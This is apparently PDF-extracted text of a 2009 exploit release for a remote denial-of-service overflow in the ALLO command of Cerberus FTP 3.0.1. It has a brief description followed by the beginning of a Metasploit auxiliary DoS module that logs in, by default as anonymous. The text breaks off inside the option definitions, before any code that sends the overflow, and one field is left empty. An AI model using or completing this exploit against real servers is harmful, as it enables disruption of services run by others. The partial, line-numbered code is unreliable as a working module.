Cerberus FTP 3.0.1 ALLO Remote Overflow DoS Exploit meta.pdf

1 ##################################################################################### 2 3 Application: Cerberus FTP 3.0.1 4 5 Platforms: Windows XP Professional SP2 6 7 crash: N/A 8 9 Exploitation: remote DoS 10 11 Date: 2009−08−24 12 13 Author: Francis Provencher (Protek Research Lab’s) 14 15 16 ##################################################################################### 17 18 1) Introduction 19 2) Technical details 20 3) The Code 21 22 23 ##################################################################################### 24 25 =============== 26 1) Introduction 27 28 =============== 29 Cerberus FTP Server is a secure and easy−to−use professional Windows FTP server featuring FIPS 140−2 certified encryp tion. 30 31 ##################################################################################### 32 33 ============================ 34 2) Technical details 35 ============================ 36 37 The validation of some ftp commands are not made by the server. This lead to a a DoS.... 38 39 40 41 ##################################################################################### 42 43 =========== 44 3) The Code 45 =========== 46 47 Proof of concept DoS code; 48 49 require ’msf/core’ 50 51 class Metasploit3 < Msf::Auxiliary Page 1/2 Cerberus FTP 3.0.1 ALLO Remote Overflow DoS Exploit meta Francis Provencher 08/25/2009 52 53 include Msf::Exploit::Remote::Ftp 54 include Msf::Auxiliary::Dos 55 56 def initialize(info = {}) 57 super(update_info(info, 58 ’Name’ => ’Cerberus FTP command ALLO overflow’, 59 ’Description’ => %q{ 60 You need to have a valid login 61 so you can run ALLO command. 62 }, 63 ’Author’ => ’Francis Provencher "Protek Research Lab’s", 64 ’License’ => MSF_LICENSE, 65 ’Version’ => ’1’, 66 ’References’ => 67 68 ’DisclosureDate’ => ’Aug 24 2009’)) 69 70 # They’re required 71 register_options([ 72 OptString.new(’FTPUSER’, [ true, ’Valid FTP username’, ’anonymous’ ]), 73 OptString.new(’FTPPASS’, [ true,